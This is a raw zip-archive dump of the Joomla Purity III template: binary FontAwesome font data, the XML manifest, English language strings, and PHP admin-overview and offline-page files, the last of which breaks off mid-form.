���@�h����������<���<�<���<����o7��������T�T�_���L��d��h�aahi`a�h���������
�/ti
�V���H������
��ԫ���ԫ��
��
��]�������������T�t���.�;���;��<:�Z�����:����3}|������A���P
3C��ɽ������Nb�a�]����
0�$�7o"�7�l�����
������������
��
@���
�����������������<�<��y}|z��i
�z�{�R�D3���$�$D�R����i�p���������w��������
����
E�Q��y��
���
���1�
0
��
fM�@�
jm��q�����������,�4[�
���@XtxmihbW_)�RK(
t����:���z�{���������z}R��%���7��tC
(
�t�
���z�x
����x
�
!5������x
����&�%y}��������_g��������g_��
����
��*1���0���˒�����������h�����
��`V������m�����������[
ˋˋˋˋˋ�7���ߋ�7�������
K��������[���L����z����������-
�-��������������������Ty�������!�5�����z��+���&m���/�%��t��~���-���������\�$�"�W�T�*��������n�h�t��t��t���v��������������#�#��
��	��h��3��3s�pyrs@ ��  ""
	���x@8 �����!"""`���>�N�^�f�i�n�~��������������'�(�.�>�N�^�n�~��������������>�N�^�n�~������������ �����!"""`���!�@�P�`�g�j�p�������������� �(�)�0�@�P�`�p��������������!�@�P�`�p��������������\�Q�A�0��ޕ�R

	��������������������������������������v^��%|�_<��O<0�1h�����	�	����	��p��v�_�]�����y�n�����2��@����������������z�����Z@�5�5
���ZZ����@���������,_���@��������f���@	��@��(������@�����@��@-
�M�M�-�
�M�M�����@�����@@�
�-������b����
��� ����5�-�8�����@�D@���,*@� ���������	m��)@�@	 	' D9��>dU*#						�	��	����R										�@	e�	
%RE	 		$�� k(��D�'	��	�%��	�%	��	��0$�.�$P�//:/K/Q]�	
���	^�	U	k	"y	U	$�	U	��	a		y	*�	<�Copyright Dave Gandy 2016. All rights reserved.FontAwesomeFONTLAB:OTFEXPORTVersion 4.7.0 2016Please refer to the Copyright section for the font trademark attribution notices.Fort AwesomeDave Gandyhttp://fontawesome.iohttp://fontawesome.io/license/Copyright Dave Gandy 2016. All rights reserved.FontAwesomeRegularFONTLAB:OTFEXPORTVersion 4.7.0 2016Please refer to the Copyright section for the font trademark attribution notices.Fort AwesomeDave Gandyhttp://fontawesome.iohttp://fontawesome.io/license/PKԜ�\�#o,,(purity_iii/fonts/font-awesome/index.htmlnu&1i�<html><body bgcolor="#FFFFFF"></body></html>PKԜ�\Ir�+purity_iii/templateDetails.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE install PUBLIC "-//Joomla! 1.6//DTD template 1.0//EN" "http://www.joomla.org/xml/dtd/1.6/template-install.dtd">
<extension version="2.5" type="template" method="upgrade" client="site">
	<name>purity_III</name>
	<version>2.1.1</version>
	<creationDate>March 28th, 2024</creationDate>
	<author>JoomlArt.com</author>
	<authorEmail>webmaster@joomlart.com</authorEmail>
	<authorUrl>http://www.t3-framework.org</authorUrl>
	<copyright>Copyright (C), J.O.O.M Solutions Co., Ltd. All Rights Reserved.</copyright>
	<license>license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html</license>
	<t3>
		<base>base-bs3</base>
	</t3>
	<description>
		<![CDATA[
		<div align="center">
			<div class="alert alert-success" style="background-color:#DFF0D8;border-color:#D6E9C6;color: #468847;padding: 1px 0;">
				<h2>Purity III Template references</h2>
				<h4><a href="http://joomla-templates.joomlart.com/purity_iii/" title="Purity III Template demo">Live Demo</a> | <a href="http://www.joomlart.com/documentation/joomla-templates/purity-iii" title="purity iii template documentation">Documentation</a> | <a href="http://www.joomlart.com/forums/forumdisplay.php?542-Purity-III" title="purity iii forum">Forum</a> | <a href="http://www.joomlart.com/joomla/templates/purity-iii" title="Purity III template more info">More Info</a></h4>
				<p> </p>
				<span style="color:#FF0000">Note: Purity III requires T3 plugin to be installed and enabled.</span>
				<p> </p>
				<p>Copyright 2004 - 2020 <a href='http://www.joomlart.com/' title='Visit Joomlart.com!'>JoomlArt.com</a>.</p>
			</div>
			<style>table.adminform{width: 100%;}</style>
		</div>
		]]>
	</description>
	<files>
		<filename>component.php</filename>
		<filename>favicon.ico</filename>
		<filename>index.html</filename>
		<filename>index.php</filename>
		<filename>thememagic.xml</filename>
		<filename>templateInfo.php</filename>
		<filename>templateHook.php</filename>
		<filename>template_preview.png</filename>
		<filename>template_thumbnail.png</filename>
		<filename>templateDetails.xml</filename>
		<filename>helper.php</filename>
		<filename>offline.php</filename>
		<filename>error.php</filename>
		<folder>etc</folder>
		<folder>fonts</folder>
		<folder>html</folder>
		<folder>css</folder>
		<folder>js</folder>
		<folder>less</folder>
		<folder>language</folder>
		<folder>images</folder>
		<folder>tpls</folder>
	</files>
	
	<languages folder="language">
		<language tag="en-GB">en-GB/en-GB.tpl_purity_iii.ini</language>
		<language tag="en-GB">en-GB/en-GB.tpl_purity_iii.sys.ini</language>
	</languages>

	<positions>
		<position>languageswitcherload</position>
		<position>head-search</position>
		<position>magazine-articles</position>
		<position>mainnav</position>
		<position>navhelper</position>
		<position>breadcrumbs</position>
		<position>slideshow</position>
		<position>masthead</position>
		<position>off-canvas</position>
		<position>sidebar-1</position>
		<position>sidebar-2</position>
		<position>mast-col</position>
		<position>after-content</position>
		<position>footer</position>
		<position>mega</position>
		<position>sitemapload</position>
		<position>features-intro-1</position>
		<position>features-intro-2</position>
		<position>position-0</position>
		<position>position-1</position>
		<position>position-2</position>
		<position>position-3</position>
		<position>position-4</position>
		<position>position-5</position>
		<position>position-6</position>
		<position>position-7</position>
		<position>position-8</position>
		<position>position-9</position>
		<position>position-10</position>
		<position>position-11</position>
		<position>position-12</position>
		<position>position-13</position>
		<position>position-14</position>
		<position>position-15</position>
		<position>footer-0</position>
		<position>footer-1</position>
		<position>footer-2</position>
		<position>footer-3</position>
		<position>footer-4</position>
		<position>footer-5</position>
		<position>footer-6</position>
		<position>footer-7</position>
		<position>footer-8</position>
		<position>footer-9</position>
		<position>footer-10</position>
		<position>home-1</position>
		<position>home-2</position>
		<position>home-3</position>
		<position>home-4</position>
		<position>home-5</position>
		<position>home-6</position>
		<position>tab-1</position>
		<position>tab-2</position>
		<position>debug</position>
	</positions>

	<config>
		<fields name="params" addfieldpath="/plugins/system/t3/includes/depend">

			<!-- Sample for add or disable template parameters -->
			<!--fieldset name="menu_params" label="T3_PARAMS_MEGAMENU">
				<field name="group_disable" type="t3depend" function="@group">
					<option for="menu_as_bg" value="no">menu_as_bg</option>
				</field>
			</fieldset-->

			<fieldset name="purity_iii_params" label="TPL_EXTENDED_TAB_LABEL" description="TPL_EXTENDED_TAB_LABEL">

				<field name="tpl_article_info_datetime_format" type="list" default="d M Y"
							 global="1"
							 label="TPL_ARTICLE_INFO_DATETIME_FORMAT_LABEL"
							 description="TPL_ARTICLE_INFO_DATETIME_FORMAT_DESC">
					<option value="d M Y">TPL_DATE_SHORT</option>
					<option value="d F Y">TPL_DATE_FULL_MONTH</option>
					<option value="l, d F Y">TPL_DATE_FULL</option>
				</field>

			</fieldset>
			
		</fields>
	</config>

	<updateservers>
		<server type="extension">http://update.joomlart.com/service/tracking/j31/purity_iii.xml</server>
	</updateservers>

</extension>
PKԜ�\��6purity_iii/language/en-GB/en-GB.tpl_purity_iii.sys.ininu&1i�T3_OVERVIEW_TPL_SAME			="Congrats! You are using latest version of %s!"
T3_OVERVIEW_TPL_SAME_MSG		="Your version is <strong>%s</strong>"
T3_OVERVIEW_TPL_NEW_MSG			="Your version is <strong>%s</strong>. %s's latest version is <strong>%s</strong>."
T3_OVERVIEW_TPL_NEW				="Dude! There's a newer version for your %s!"

;Template extended section
TPL_EXTENDED_TAB_LABEL          ="JA Purity III"
TPL_EXTENDED_TAB_DESC           ="JA Purity III specific settings"

; Overwrite html
TPL_ARTICLE_INFO_DATETIME_FORMAT_LABEL  ="Article Info Datetime Format"
TPL_ARTICLE_INFO_DATETIME_FORMAT_DESC   ="Article Info Datetime Format"
TPL_DATE_SHORT                  ="Short (ex 09 Jan 2014)"
TPL_DATE_FULL_MONTH             ="Full month (ex 20 January 2014)"
TPL_DATE_FULL                   ="Full (ex Monday 20 January 2014)"

; Overwrite menu item
TPL_MAGAZINE_HOME_LABEL          ="Magazine Home"
TPL_MAGAZINE_HOME_FEATURE_CONFIG_LABEL   ="Configuration for Featured articles"
TPL_MAGAZINE_FEATURED_NUM_COLUMNS_DESC   ="Number of columns which to show Feature Articles"
TPL_MAGAZINE_FEATURED_NUM_COLUMNS_LABEL  ="# Featured columns"
TPL_MAGAZINE_FEATURED_NUM_LINKS_DESC     ="Number of featured links articles"
TPL_MAGAZINE_FEATURED_NUM_LINKS_LABEL    ="# Featured links articles"
TPL_MAGAZINE_HOME_CATEGORY_LIST_CONFIG_LABEL      ="Configuration for category list"
TPL_MAGAZINE_HIGHLIGHT_NUM_ARTICLE_DESC  ="Number of category articles"
TPL_MAGAZINE_HIGHLIGHT_NUM_ARTICLE_LABEL ="# Articles"
TPL_MAGAZINE_HIGHLIGHT_NUM_COLUMN_DESC   ="Number of columns which to show articles for a category"
TPL_MAGAZINE_HIGHLIGHT_NUM_COLUMN_LABEL  ="# columns"
TPL_MAGAZINE_HIGHLIGHT_SHOW_INTRO_DESC   ="Show Intro text in category list articles"
TPL_MAGAZINE_HIGHLIGHT_SHOW_INTRO_LABEL  ="Article intro text"
TPL_MAGAZINE_ENTRY_INTRO_POSITION_DESC   ="Select positions to show Article Info"
TPL_MAGAZINE_ENTRY_INTRO_POSITION_LABEL  ="Article Info positions"
TPL_MAGAZINE_ENTRY_INTRO_POS_FEATURED    ="Featured Leading"
TPL_MAGAZINE_ENTRY_INTRO_POS_INTRO       ="Featured Intro"
TPL_MAGAZINE_ENTRY_INTRO_POS_LINKS       ="Featured Links"
TPL_MAGAZINE_ENTRY_INTRO_POS_HIGHLIGHT   ="Category list articles"
TPL_MAGAZINE_HOME_CONFIG_LABEL           ="General Configuration for Magazine Home"

TPL_MAGAZINE_SUB_LABEL                   ="Magazine category"
TPL_MAGAZINE_SUB_CONFIG_LABEL            ="Configuration for category layout"
TPL_MAGAZINE_SUB_INTRO_POSITION_DESC     ="Select positions to show Article Info"
TPL_MAGAZINE_SUB_INTRO_POSITION_LABEL    ="Article Info positions"
TPL_MAGAZINE_SUB_INTRO_POS_LEADING       ="Leading"
TPL_MAGAZINE_SUB_INTRO_POS_INTRO         ="Intro"
TPL_MAGAZINE_SUB_INTRO_POS_LINKS         ="Links"
TPL_MAGAZINE_SUB_SHOW_INTRO_DESC         ="Show Intro Text in category intro articles"
TPL_MAGAZINE_SUB_SHOW_INTRO_LABEL        ="Show Intro Text"

TPL_MAGAZINE_ARTICLE_LABEL               ="Magazine Article"
TPL_MAGAZINE_ARTICLE_LAYOUT_LABEL        ="Article Layout"

TPL_MAGAZINE_ARTICLE_INFO_LABEL          ="Article Info Options"

; Glossary language
TPL_SHOW_NAVIGATION_LABEL       = "Show navigation"
TPL_SHOW_NAVIGATION_DESC        = "Show glossary navigation"
TPL_SHOW_EMPTY_GROUP_LABEL      = "Show empty group"
TPL_SHOW_EMPTY_GROUP_DESC       = "Show empty group"
TPL_SHOW_DETAIL_IN_POPUP_LABEL  = "Show detail in popup"
TPL_SHOW_DETAIL_IN_POPUP_DESC   = "Show detail in popup"
TPL_ORDER_DIRECTION_LABEL       = "Order Direction"
TPL_ORDER_DIRECTION_DESC        = "Select the direction you would like Articles to beordered by"
TPL_ORDER_DIRECTION_DESCENDING_VALUE        = "Descending"
TPL_ORDER_DIRECTION_ASCENDING_VALUE         = "Ascending"

; XML
TPL_GROUP_EXTRA_FIELDS_LABEL            ="Extra Fields"
TPL_GROUP_EXTRA_FIELDS_DESC             ="Extra Fields group"
TPL_MENU_ITEM_MASTHEAD_TITLE_LABEL      ="Masthead Title"
TPL_MENU_ITEM_MASTHEAD_TITLE_DESC       ="Masthead Title"
TPL_MENU_ITEM_MASTHEAD_SLOGAN_LABEL     ="Masthead Slogan"
TPL_MENU_ITEM_MASTHEAD_SLOGAN_DESC      ="Masthead Slogan"
TPL_ARTICLE_EXTRA_CLASS_LABEL           ="Extra class"
TPL_ARTICLE_EXTRA_CLASS_DESC            ="Extra Class for the article"

; Portfolio extra fields
TPL_EXTRAFIELDS_PORTFOLIO_STATE_LABEL   ="Special state"
TPL_EXTRAFIELDS_PORTFOLIO_STATE_DESC    ="Product Special state"
TPL_EXTRAFIELDS_PORTFOLIO_DEMO_LABEL    ="Demo Link"
TPL_EXTRAFIELDS_PORTFOLIO_DEMO_DESC     ="Product Demo Link"

JGLOBAL_SHOW_ICONS_LABEL="Show Icons"
JGLOBAL_SHOW_PRINT_ICON_LABEL="Show Print"
JGLOBAL_SHOW_EMAIL_ICON_LABEL="Show Email"PKԜ�\���+�+2purity_iii/language/en-GB/en-GB.tpl_purity_iii.ininu&1i�T3_MISSING_T3_PLUGIN			="T3 Plugin is not enabled"



; Common positions
T3_POS_MAINNAV					="Main Navigation"
T3_POS_MAINNAV_DESC				="Main Navigation Position"
T3_POS_SIDEBAR-1				="Sidebar 1"
T3_POS_SIDEBAR-1_DESC			="Sidebar 1"
T3_POS_SIDEBAR-2				="Sidebar 2"
T3_POS_SIDEBAR-2_DESC			="Sidebar 2"
T3_POS_MASTCOL					="Mastcol"
T3_POS_MASTCOL_DESC				="Mastcol"
T3_POS_TOPSL					="Top spotlight"
T3_POS_TOPSL_DESC				="Select positions used in Top spotlight"
T3_POS_BOTSL					="Bottom spotlight"
T3_POS_BOTSL_DESC				="Select positions used in Bottom spotlight"
T3_POS_FOOTNAV					="Footer links"
T3_POS_FOOTNAV_DESC				="Select positions used in Footer links"

T3_POS_SECTION					="Main Positions"
T3_POS_SECTION_DESC				="Select Positions"



; Theme Magic

; TYPO
T3_TM_TYPO								="Typo"
T3_TM_VARS_FONTSIZE_LABEL				="Font Size"
T3_TM_VARS_FONTSIZE_DESC				="Font Size"

T3_TM_VARS_FONTFAMILY_LABEL				="Font Family"
T3_TM_VARS_FONTFAMILY_DESC				="Font Family"
T3_TM_VARS_FONTFAMILY_SERIF				="Serif"
T3_TM_VARS_FONTFAMILY_SANS_SERIF		="Sans Serif"
T3_TM_VARS_FONTFAMILY_MONOSPACE			="Monospace"

T3_TM_VARS_HEADINGFONTFAMILY_LABEL		="Heading Font Family"
T3_TM_VARS_HEADINGFONTFAMILY_DESC		="Heading Font Family"

T3_TM_VARS_FONTFAMILY_CUSTOM			="Custom Font"
T3_TM_VARS_FONTFAMILY_CUSTOM_LABEL		="Custom Font"
T3_TM_VARS_FONTFAMILY_CUSTOM_DESC		="Example: 'Segoe UI', Arial, sans-serif"


; COLOR
T3_TM_COLORS 				="Color"

T3_TM_VARS_PRIMARY_COLOR_LABEL 		="Brand Primary Color"
T3_TM_VARS_PRIMARY_COLOR_DESC 		="Brand Primary Color"

T3_TM_VARS_SECONDARY_COLOR_LABEL 		="Brand Secondary Color"
T3_TM_VARS_SECONDARY_COLOR_DESC 		="Brand Secondary Color"

T3_TM_VARS_BODY_BKG_LABEL		="Background Color"
T3_TM_VARS_BODY_BKG_DESC		="Background Color"

T3_TM_VARS_TEXT_COLOR_LABEL		="Text Color"
T3_TM_VARS_TEXT_COLOR_DESC		="Text Color"

T3_TM_VARS_HEADING_COLOR_LABEL		="Heading Color"
T3_TM_VARS_HEADING_COLOR_DESC		="Heading Color"

T3_TM_VARS_LINK_COLOR_LABEL		="Link Color"
T3_TM_VARS_LINK_COLOR_DESC		="Link Color"


; VISUAL 
T3_TM_VISUAL						="Visual"

T3_TM_VARS_ELEMENT_RADIUS_BASE_LABEL		="Border Radius Base"
T3_TM_VARS_ELEMENT_RADIUS_BASE_DESC		="Border Radius Base"

T3_TM_VARS_ELEMENT_RADIUS_LARGE_LABEL		="Border Radius Large"
T3_TM_VARS_ELEMENT_RADIUS_LARGE_DESC		="Border Radius Large"

T3_TM_VARS_ELEMENT_RADIUS_SMALL_LABEL		="Border Radius Small"
T3_TM_VARS_ELEMENT_RADIUS_SMALL_DESC		="Border Radius Small"

; MODULE 
T3_TM_MODULE							="Module"

T3_TM_VARS_MODULE_BGCOLOR_LABEL			="Module Background Color"
T3_TM_VARS_MODULE_BGCOLOR_DESC			="Module Background Color"

T3_TM_VARS_MODULE_COLOR_LABEL			="Module Text Color"
T3_TM_VARS_MODULE_COLOR_DESC			="Module Text Color"

T3_TM_VARS_MODULE_TITLE_BGCOLOR_LABEL	="Module Title Background Color"
T3_TM_VARS_MODULE_TITLE_BGCOLOR_DESC	="Module Title Background Color"

T3_TM_VARS_MODULE_TITLE_COLOR_LABEL		="Module Title Text Color"
T3_TM_VARS_MODULE_TITLE_COLOR_DESC		="Module Title Text Color"

; SPOTLIGHT
T3_TM_SPOTLIGHT 					="Spotlight Styles"
T3_TM_VARS_SPL_BGCOLOR_LABEL 	="Spotlight Background Color"
T3_TM_VARS_SPL_BGCOLOR_DESC 	="Spotlight Background Color"
T3_TM_VARS_SPL_COLOR_LABEL 		="Spotlight Text Color"
T3_TM_VARS_SPL_COLOR_DESC 		="Spotlight Text Color"

; FOOTER
T3_TM_FOOTER				="Footer Styles"

T3_VARS_FOOTER_BG_LABEL   ="Footer Background"
T3_VARS_FOOTER_BG_DESC   ="Footer Background"
T3_VARS_FOOTER_COLOR_LABEL ="Footer Text Color"
T3_VARS_FOOTER_COLOR_DESC ="Footer Text Color"

T3_VARS_FOOTER_MOD_BG_LABEL ="Footer Module Background"
T3_VARS_FOOTER_MOD_BG_DESC ="Footer Module Background"

T3_VARS_FOOTER_MOD_TCOLOR_LABEL	="Footer Module Title Color"
T3_VARS_FOOTER_MOD_TCOLOR_DESC	="Footer Module Title Color"
T3_VARS_FOOTER_MOD_COLOR_LABEL 	="Footer Module Text Color"
T3_VARS_FOOTER_MOD_COLOR_DESC	="Footer Module Text Color"


; GRID
T3_TM_VARS_SCFD_GUTTER_LABEL="Gutter Width"
T3_TM_VARS_SCFD_GUTTER_DESC="Gutter Width"


;Template Info
T3_TPL_DESC_1					="Purity III"
T3_TPL_DESC_2					="The best free Joomla template"
T3_TPL_DESC_3					="Purity III is the free responsive Joomla template for Joomla 3 which serves as a great starter theme to set up your site from scratch with multiple preset layouts for certain needs. This template is highly compatible with most of the popular 3rd party Joomla extensions, such as: EasySocial, JomSocial, Mijoshop, Kunena, and etc. Empowered by the robust T3 Framework with Bootstrap 3 at core, Purity III is responsive ready and fully customizable with the customization tool - ThemeMagic for a flexible layout system."
T3_TPL_DESC_4					="Resources:"
T3_TPL_DESC_5					="<a href='http://www.joomlart.com/forums/downloads.php?do=cat&id=519' title='Download Link'>Download Link</a>"
T3_TPL_DESC_6					="<a href='http://www.joomlart.com/documentation/joomla-templates/purity-iii' title='Documentation Link'>Documentation Link</a>"
T3_TPL_DESC_7					="<a href='http://pm.joomlart.com/browse/PURITYIII' title='Changelog Link'>Changelog Link</a>"
T3_TPL_DESC_8					="<a href='http://www.joomlart.com/forums/forumdisplay.php?542-Purity-III' title='Forum Link'>Forum Link</a>"


;Template extended section
TPL_EXTENDED_TAB_LABEL          ="JA Purity III"
TPL_EXTENDED_TAB_DESC           ="JA Purity III specific settings"

; Overwrite html
TPL_ARTICLE_INFO_DATETIME_FORMAT_LABEL  ="Article Info Datetime Format"
TPL_ARTICLE_INFO_DATETIME_FORMAT_DESC   ="Article Info Datetime Format"
TPL_DATE_SHORT                  ="Short (ex 09 Jan 2014)"
TPL_DATE_FULL_MONTH             ="Full month (ex 20 January 2014)"
TPL_DATE_FULL                   ="Full (ex Monday 20 January 2014)"

; Overwrite menu item
TPL_MAGAZINE_HOME_LABEL          ="Magazine Home"
TPL_MAGAZINE_HOME_FEATURE_CONFIG_LABEL   ="Configuration for Featured articles"
TPL_MAGAZINE_FEATURED_NUM_COLUMNS_DESC   ="Number of columns which to show Feature Articles"
TPL_MAGAZINE_FEATURED_NUM_COLUMNS_LABEL  ="# Featured columns"
TPL_MAGAZINE_FEATURED_NUM_LINKS_DESC     ="Number of featured links articles"
TPL_MAGAZINE_FEATURED_NUM_LINKS_LABEL    ="# Featured links articles"
TPL_MAGAZINE_HOME_CATEGORY_LIST_CONFIG_LABEL      ="Configuration for category list"
TPL_MAGAZINE_HIGHLIGHT_NUM_ARTICLE_DESC  ="Number of category articles"
TPL_MAGAZINE_HIGHLIGHT_NUM_ARTICLE_LABEL ="# Articles"
TPL_MAGAZINE_HIGHLIGHT_NUM_COLUMN_DESC   ="Number of columns which to show articles for a category"
TPL_MAGAZINE_HIGHLIGHT_NUM_COLUMN_LABEL  ="# columns"
TPL_MAGAZINE_HIGHLIGHT_SHOW_INTRO_DESC   ="Show Intro text in category list articles"
TPL_MAGAZINE_HIGHLIGHT_SHOW_INTRO_LABEL  ="Article intro text"
TPL_MAGAZINE_ENTRY_INTRO_POSITION_DESC   ="Select positions to show Article Info"
TPL_MAGAZINE_ENTRY_INTRO_POSITION_LABEL  ="Article Info positions"
TPL_MAGAZINE_ENTRY_INTRO_POS_FEATURED    ="Featured Leading"
TPL_MAGAZINE_ENTRY_INTRO_POS_INTRO       ="Featured Intro"
TPL_MAGAZINE_ENTRY_INTRO_POS_LINKS       ="Featured Links"
TPL_MAGAZINE_ENTRY_INTRO_POS_HIGHLIGHT   ="Category list articles"
TPL_MAGAZINE_HOME_CONFIG_LABEL           ="General Configuration for Magazine Home"

TPL_MAGAZINE_SUB_LABEL                   ="Magazine category"
TPL_MAGAZINE_SUB_CONFIG_LABEL            ="Configuration for category layout"
TPL_MAGAZINE_SUB_INTRO_POSITION_DESC     ="Select positions to show Article Info"
TPL_MAGAZINE_SUB_INTRO_POSITION_LABEL    ="Article Info positions"
TPL_MAGAZINE_SUB_INTRO_POS_LEADING       ="Leading"
TPL_MAGAZINE_SUB_INTRO_POS_INTRO         ="Intro"
TPL_MAGAZINE_SUB_INTRO_POS_LINKS         ="Links"
TPL_MAGAZINE_SUB_SHOW_INTRO_DESC         ="Show Intro Text in category intro articles"
TPL_MAGAZINE_SUB_SHOW_INTRO_LABEL        ="Show Intro Text"

TPL_MAGAZINE_ARTICLE_LABEL               ="Magazine Article"
TPL_MAGAZINE_ARTICLE_LAYOUT_LABEL        ="Article Layout"

TPL_MAGAZINE_ARTICLE_INFO_LABEL          ="Article Info Options"

; Glossary language
TPL_SHOW_NAVIGATION_LABEL       = "Show navigation"
TPL_SHOW_NAVIGATION_DESC        = "Show glossary navigation"
TPL_SHOW_EMPTY_GROUP_LABEL      = "Show empty group"
TPL_SHOW_EMPTY_GROUP_DESC       = "Show empty group"
TPL_SHOW_DETAIL_IN_POPUP_LABEL  = "Show detail in popup"
TPL_SHOW_DETAIL_IN_POPUP_DESC   = "Show detail in popup"
TPL_ORDER_DIRECTION_LABEL       = "Order Direction"
TPL_ORDER_DIRECTION_DESC        = "Select the direction you would like Articles to beordered by"
TPL_ORDER_DIRECTION_DESCENDING_VALUE        = "Descending"
TPL_ORDER_DIRECTION_ASCENDING_VALUE         = "Ascending"

; XML
TPL_GROUP_EXTRA_FIELDS_LABEL            ="Extra Fields"
TPL_GROUP_EXTRA_FIELDS_DESC             ="Extra Fields group"
TPL_MENU_ITEM_MASTHEAD_TITLE_LABEL      ="Masthead Title"
TPL_MENU_ITEM_MASTHEAD_TITLE_DESC       ="Masthead Title"
TPL_MENU_ITEM_MASTHEAD_SLOGAN_LABEL     ="Masthead Slogan"
TPL_MENU_ITEM_MASTHEAD_SLOGAN_DESC      ="Masthead Slogan"
TPL_ARTICLE_EXTRA_CLASS_LABEL           ="Extra class"
TPL_ARTICLE_EXTRA_CLASS_DESC            ="Extra Class for the article"

; Portfolio extra fields
TPL_EXTRAFIELDS_PORTFOLIO_STATE_LABEL   ="Special state"
TPL_EXTRAFIELDS_PORTFOLIO_STATE_DESC    ="Product Special state"
TPL_EXTRAFIELDS_PORTFOLIO_DEMO_LABEL    ="Demo Link"
TPL_EXTRAFIELDS_PORTFOLIO_DEMO_DESC     ="Product Demo Link"

; MODULE POSITIONS
TPL_PURITY_III_POSITION_LANGUAGESWITCHERLOAD = "languageswitcherload"
TPL_PURITY_III_POSITION_HEAD-SEARCH = "head-search"
TPL_PURITY_III_POSITION_MAINNAV = "mainnav"
TPL_PURITY_III_POSITION_NAVHELPER = "navhelper"
TPL_PURITY_III_POSITION_BREADCRUMBS = "breadcrumbs"
TPL_PURITY_III_POSITION_OFF-CANVAS = "off-canvas"
TPL_PURITY_III_POSITION_SIDEBAR-1 = "sidebar-1"
TPL_PURITY_III_POSITION_SIDEBAR-2 = "sidebar-2"
TPL_PURITY_III_POSITION_MAST-COL = "mast-col"
TPL_PURITY_III_POSITION_FOOTER = "footer"
TPL_PURITY_III_POSITION_FEATURES-INTRO-1 = "features-intro-1"
TPL_PURITY_III_POSITION_POSITION-0 = "position-0"
TPL_PURITY_III_POSITION_POSITION-1 = "position-1"
TPL_PURITY_III_POSITION_POSITION-2 = "position-2"
TPL_PURITY_III_POSITION_POSITION-3 = "position-3"
TPL_PURITY_III_POSITION_POSITION-4 = "position-4"
TPL_PURITY_III_POSITION_POSITION-5 = "position-5"
TPL_PURITY_III_POSITION_POSITION-6 = "position-6"
TPL_PURITY_III_POSITION_POSITION-7 = "position-7"
TPL_PURITY_III_POSITION_POSITION-8 = "position-8"
TPL_PURITY_III_POSITION_POSITION-9 = "position-9"
TPL_PURITY_III_POSITION_POSITION-10 = "position-10"
TPL_PURITY_III_POSITION_POSITION-11 = "position-11"
TPL_PURITY_III_POSITION_POSITION-12 = "position-12"
TPL_PURITY_III_POSITION_POSITION-13 = "position-13"
TPL_PURITY_III_POSITION_POSITION-14 = "position-14"
TPL_PURITY_III_POSITION_POSITION-15 = "position-15"
TPL_PURITY_III_POSITION_FOOTER-0 = "footer-0"
TPL_PURITY_III_POSITION_FOOTER-1 = "footer-1"
TPL_PURITY_III_POSITION_FOOTER-2 = "footer-2"
TPL_PURITY_III_POSITION_FOOTER-3 = "footer-3"
TPL_PURITY_III_POSITION_FOOTER-4 = "footer-4"
TPL_PURITY_III_POSITION_FOOTER-5 = "footer-5"
TPL_PURITY_III_POSITION_FOOTER-6 = "footer-6"
TPL_PURITY_III_POSITION_FOOTER-7 = "footer-7"
TPL_PURITY_III_POSITION_FOOTER-8 = "footer-8"
TPL_PURITY_III_POSITION_FOOTER-9 = "footer-9"
TPL_PURITY_III_POSITION_FOOTER-10 = "footer-10"
TPL_PURITY_III_POSITION_DEBUG = "debug"
TPL_PURITY_III_BACKTOTOP="Back to Top"

? TPLS
TPL_OFF_CANVAS_HEADER_TITLE = "Sidebar"
PKԜ�\�굣purity_iii/templateInfo.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2014 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

 
// no direct access
defined('_JEXEC') or die;
?>

<div class="span4 col-md-4">
	<div class="tpl-preview">
		<img src="<?php echo T3_TEMPLATE_URL ?>/template_preview.png" alt="Template Preview"/>
	</div>
</div>
<div class="span8 col-md-8">
	<div class="t3-admin-overview-header">
		<h2>
			<?php echo JText::_('T3_TPL_DESC_1') ?>
			<small><?php echo JText::_('T3_TPL_DESC_2') ?></small>
		</h2>
		<p><?php echo JText::_('T3_TPL_DESC_3') ?></p>
	</div>
	<div class="t3-admin-overview-body">
		<h4><?php echo JText::_('T3_TPL_DESC_4') ?></h4>
		<ul class="t3-admin-overview-features">
			<li><?php echo JText::_('T3_TPL_DESC_5') ?></li>
			<li><?php echo JText::_('T3_TPL_DESC_6') ?></li>
			<li><?php echo JText::_('T3_TPL_DESC_7') ?></li>
			<li><?php echo JText::_('T3_TPL_DESC_8') ?></li>
		</ul>
	</div>
</div>PKԜ�\2�X�
�
purity_iii/offline.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Template.system
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
$app = JFactory::getApplication();

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

require_once JPATH_ADMINISTRATOR . '/components/com_users/helpers/users.php';

$twofactormethods = UsersHelper::getTwoFactorMethods();
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<jdoc:include type="head" />
	<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/purity_iii/css/offline.css" type="text/css" />
</head>
<body>
<jdoc:include type="message" />
	<div id="frame" class="outline">
		<?php if ($app->getCfg('offline_image') && file_exists($app->getCfg('offline_image'))) : ?>
		<img src="<?php echo $app->getCfg('offline_image'); ?>" alt="<?php echo htmlspecialchars($app->getCfg('sitename')); ?>" />
		<?php endif; ?>
		<h1>
			<?php echo htmlspecialchars($app->getCfg('sitename')); ?>
		</h1>
	<?php if ($app->getCfg('display_offline_message', 1) == 1 && str_replace(' ', '', $app->getCfg('offline_message')) != '') : ?>
		<p class="offline-message">
			<?php echo $app->getCfg('offline_message'); ?>
		</p>
	<?php elseif ($app->getCfg('display_offline_message', 1) == 2 && str_replace(' ', '', JText::_('JOFFLINE_MESSAGE')) != '') : ?>
		<p class="offline-message">
			<?php echo JText::_('JOFFLINE_MESSAGE'); ?>
		</p>
	<?php  endif; ?>
	<form action="<?php echo JRoute::_('index.php', true); ?>" method="post" id="form-login">
	<fieldset class="input">
